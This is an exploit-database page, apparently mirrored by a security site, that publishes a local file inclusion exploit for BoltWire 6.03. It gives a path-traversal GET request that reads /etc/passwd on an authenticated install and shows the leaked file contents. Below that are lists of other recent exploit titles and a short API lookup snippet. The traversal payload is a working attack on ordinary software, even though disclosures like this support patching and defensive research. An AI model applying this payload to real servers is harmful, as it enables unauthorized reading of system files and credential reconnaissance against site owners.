Search for hundreds of thousands of exploits

"BoltWire 6.03 - Local File Inclusion"

Author

Exploit author

"Andrey Stoykov"

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Exploit Title: BoltWire 6.03 - Local File Inclusion
# Date: 2020-05-02
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.boltwire.com/
# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
# Version: 6.03
# Tested on: Ubuntu 20.04 LAMP


LFI:

Steps to Reproduce:

1) Using HTTP GET request browse to the following page, whilst being authenticated user.
http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd

Result

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
[SNIPPED]
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-04"BoltWire 6.03 - Local File Inclusion"webappsphp"Andrey Stoykov"
2020-03-02"Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)"localwindows"Andrey Stoykov"
2020-02-24"ATutor 2.2.4 - 'id' SQL Injection"webappsphp"Andrey Stoykov"
2019-07-15"Streamripper 2.6 - 'Song Pattern' Buffer Overflow"localwindows"Andrey Stoykov"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48411/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.